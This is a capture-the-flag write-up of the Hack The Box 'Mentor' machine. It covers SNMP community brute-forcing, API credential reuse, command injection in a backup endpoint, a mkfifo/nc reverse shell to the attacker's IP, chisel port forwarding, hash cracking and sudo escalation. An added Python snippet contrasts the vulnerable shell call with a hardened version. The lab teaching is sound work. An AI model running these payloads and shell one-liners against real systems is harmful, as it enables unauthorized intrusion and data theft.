Hackthebox - Mentor

Nmap
┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.11.193
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-25 10:50 EST
Nmap scan report for 10.10.11.193
Host is up (0.028s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c73bfc3cf9ceee8b4818d5d1af8ec2bb (ECDSA)
|_ 256 4440084c0ecbd4f18e7eeda85c68a4f7 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://mentorquotes.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 896.09 seconds
We need to edit the /etc/hosts file and add this:
10.10.11.193 mentorquotes.htb
UDP
I was kind of stuck on enumeration at first (I had checked port 80 but did not think of subdomain enumeration right away), so I did a UDP port scan with nmap: sudo nmap -T4 -sU 10.10.11.193 and got interesting results.
Note: this taught me that it is always worth doing a UDP scan as well.
Nmap result
SNMP
Enumeration
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt mentorquotes.htb snmp
snmp-mibs-downloader
sudo apt install snmp-mibs-downloader
sudo download-mibs
sudo vi /etc/snmp/snmp.conf
We comment out the line "mibs:".
snmp-check
HTTP
We land on this page when visiting http://mentorquotes.htb/

Gobuster does not give anything interesting.
Here is the HTTP response header with some info.
API
Let's try subdomain with wfuzz
wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://mentorquotes.htb/' -H "HOST: FUZZ.mentorquotes.htb"
Here we get mainly 302s, except for api, which gives us a 404. Let's add it to the /etc/hosts file:
10.10.11.193 mentorquotes.htb api.mentorquotes.htb
We can use gobuster again to find endpoints on this new subdomain. We get interesting results on our API.
That's very cool: we get the docs of the API at http://api.mentorquotes.htb/docs.
We also have an admin endpoint that will be worth having a look at later.
We find a username, james, and their email, james@mentorquotes.htb.
Turns out it has a signup endpoint

I created a user
It seems like we might be able to enumerate users. Let's try this.
First we need to log in to get an authorization token.

Now let's try to see info of user 1

We need to be an admin. Let's see what else we can do
I tried to brute-force the token with hashcat but it did not go anywhere.
I tried to tamper with it on jwt.io. It was useful to see how it is made, but we do not have the key.
Also, the common attacks on JWT did not work.
Let's try to play with the signup and see if we could sign up another james user. If we try with the username and email it does not work: we get a message saying that the user already exists. Using this we can check whether the admin user we found when enumerating SNMP exists on the API. It does not, so let's keep trying to impersonate james.
I tried different things but nothing worked.
Back to SNMP
Let's try to go further with SNMP, maybe we'll have more luck.
We did not try all the possible tools or wordlists.
Let's use onesixtyone with this wordlist
onesixtyone -c wordlist-common-snmp-community-strings.txt 10.10.11.193
Nothing here.
Let's try it also with nmap
sudo nmap -sU --script snmp-brute 10.10.11.193 --script-args snmp-brute.communitiesdb=wordlist-common-snmp-community-strings.txt
We do not get anything more than the public community.
We can also use this tool. I really recommend using a pipenv to install it.
sudo apt update
We update our Kali.
sudo apt install python3-venv
We install venv.
python3 -m venv snmpbrute
We create a new venv.
source snmpbrute/bin/activate
We activate it.
pip install scapy
It requires scapy to work properly.
python3 snmpbrute.py -t 10.10.11.193 -p 161
It found another community: internal
Once we are done with snmpbrute we can deactivate the env by typing
deactivate
Let's run snmpwalk. We will have to put the output in a file, because it is huge.
snmpwalk -c internal 10.10.11.193 -v2c > internalenum
Let's see what is in the file and search for "STRING"; it seems to output interesting info.
We find a string that looks like a password: kj23sadkj123as0-d213!
Let's try it in our API to see if we get james this way. If it does not work on the API we will try it on SSH.
It works, we get a token!

Let's try our juicy endpoints. It seems to work: we can list the users.

Apart from james we also have an svc account.
Another interesting endpoint to check is the one that is not in the docs but that gobuster found for us: /admin/.
When we try to access /admin/check, it says it is not implemented yet.
When we try to access /admin/backup, it does not accept the GET method. Let's try with a POST.
It needs a body, and we should also change the Content-Type header to application/json. So our request in Burp Repeater looks like this:

We get another piece of info from the response: it also needs a path.

As it wants a path, let's ask it for /etc/passwd. It seems to work but does not output the file.
Let's try to see if it can execute commands. This is the value that we will put in path:
/etc/passwd;wget http://10.10.14.5/test
Also, before sending the request we need to launch our Python HTTP server; this way we will see if it actually fetches the file.
python3 -m http.server 80
Here is our request:

It does get the file!

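The request above works because the backup endpoint hands the supplied path to a shell, which splits on the semicolon. As an added illustration (not the box's code; the page does not show the application's implementation), here is that vulnerable pattern in Python next to a hardened version that confines the path to an allowed backup root and never invokes a shell. The BACKUP_ROOT directory and the function names are assumptions.

```python
import tarfile
import tempfile
from pathlib import Path

# Hypothetical directory the endpoint may back up (assumption, not from the box).
BACKUP_ROOT = Path("/srv/mentorquotes/data")

def build_backup_cmd_unsafe(path: str, out: str) -> str:
    # Vulnerable pattern: the request's "path" lands verbatim in a shell command
    # line run with shell=True. The shell splits on ';', so the value used on
    # this page, "/etc/passwd;wget ...", executes a second command.
    return f"tar czf {out} {path}"

def confine(path: str, root: Path = BACKUP_ROOT):
    # Resolve the request against the backup root and require it to stay inside.
    # Absolute paths (root / "/etc/..." discards root), "..", and symlinks that
    # resolve elsewhere are rejected; so is anything that is not a plain file.
    # Returns the resolved Path, or None when the request is not allowed.
    root = root.resolve()
    target = (root / path).resolve()
    if root not in target.parents or not target.is_file():
        return None
    return target

def backup_safe(path: str, out: Path, root: Path = BACKUP_ROOT) -> list:
    # Hardened form: validated path and no shell at all (tarfile runs in-process,
    # so there is no command line for metacharacters to break out of).
    target = confine(path, root)
    if target is None:
        raise ValueError(f"refusing to back up {path!r}")
    with tarfile.open(out, "w:gz") as tf:
        tf.add(target, arcname=target.name)
    with tarfile.open(out, "r:gz") as tf:
        return tf.getnames()

def demo() -> dict:
    # Constructed scenario: a temporary backup root holding one sample file.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "data"
        root.mkdir()
        (root / "quotes.json").write_text('{"quote": "constructed sample"}\n')
        return {
            "legit": backup_safe("quotes.json", Path(tmp) / "backup.tgz", root),
            "injection": confine("/etc/passwd;wget http://10.10.14.5/test", root),
            "traversal": confine("../../etc/passwd", root),
        }
```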
So now we should try to get a shell. Let's set up a listener:
rlwrap nc -lvp 4444
So I tried multiple payloads from my pentips, pentestmonkey and PayloadsAllTheThings.
The only one that worked is this one (do not forget the semicolon at the end, and use sh and not bash, because bash will fail):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f;
So we get a shell. It's root, but the last time I saw this it was because I ended up in a Docker container.

And an ls proves that we are indeed in Docker again.

We can grab the user flag from /home/svc/user.txt
Privilege Escalation
Looking around we find different interesting files.
/app/app/db.py shows the database URL:
os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")
Note that here we get the connection string to the db. The username and password are postgres:postgres
Postgresql
With a quick search we can find that the default PostgreSQL port is 5432.
We could try our luck there.
To install chisel on your Kali:
curl https://i.jpillora.com/chisel! | bash
Then you will need to put a chisel binary on your target.
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
Get it on your Kali.
gzip -d chisel_1.7.7_linux_amd64.gz
Extract it.
python3 -m http.server 80
Start your Python server.
wget http://10.10.14.5/chisel_1.7.7_linux_amd64
Get it from the target.
chmod +x chisel_1.7.7_linux_amd64
Make it executable.
Now we need to launch a chisel server on our Kali:
sudo chisel server --port 5555 --reverse
./chisel_1.7.7_linux_amd64 client -v 10.10.14.5:5555 R:5432:172.22.0.1:5432
We forward the PostgreSQL port to be able to access it from our Kali.
psql -h 10.10.14.5 -U "postgres" -p 5432
Let's try to connect to the database. If you need a refresher on PostgreSQL, here is a nice article.
\l
List the databases.
\c mentorquotes_db
We connect to the db we want.
select * from "users";
Let's crack svc's password in hashcat:
hashcat -m 0 hash /usr/share/wordlists/rockyou.txt
We get this password:
53f22d0dfa10dce7e29cd31f4f953fd8:123meunomeeivani
We can now connect over SSH as svc:
ssh svc@10.10.11.193
which is a more convenient shell.
linpeas
Let's upload linpeas to our target to enumerate.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
python3 -m http.server 80
And on our target:
wget http://10.10.14.5/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64
linpeas finds the snmpd conf file. Let's have a look.

It contains a password!
SuperSecurePassword123__
SSH as james
Let's try to use it for james:
ssh james@10.10.11.193
It works!
James' sudo rights
Let's first try sudo -l, and if it does not work let's run linpeas again.
We get something really interesting! James has sudo rights on /bin/sh. Let's try:
sudo /bin/sh
It works, we have a root shell.

We can grab the flag